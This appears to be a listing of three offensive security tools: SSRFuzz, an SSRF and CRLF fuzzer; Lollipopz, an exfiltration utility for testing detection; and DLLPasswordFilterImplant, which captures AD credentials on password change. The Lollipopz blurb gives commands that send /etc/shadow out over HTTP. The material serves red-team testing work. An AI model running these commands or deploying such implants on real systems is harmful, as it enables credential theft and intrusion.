SSRFuzz – A Tool To Find Server Side Request Forgery Vulnerabilities, With CRLF Chaining Capabilities

SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities Why? I wanted to write a tool in Golang for concurrency I wanted to fuzz parameters for SSRF vulnerablities, as well as fuzz both paths and parameters for CRLF injections I was inspired by Orange’s work for chaining these typesRead More

Lollipopz – Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./ -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./ -m lollipopz.methods.http.param_cipher.GETClient -rh -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTP POST requests Server # ./ -m lollipopz.methods.http.param_cipher.POSTServer -lp 80Read More

DLLPasswordFilterImplant – DLL Password Filter Implant With Exfiltration Capabilities

DLLPasswordFilterImplant is a custom password filter DLL that allows the capture of a user’s credentials. Each password change event on a domain will trigger the registered DLL in order to exfiltrate the username and new password value prior successfully changing it in the Active Directory (AD).For more information about password filters consult Microsoft’s documentation.Installing ToRead More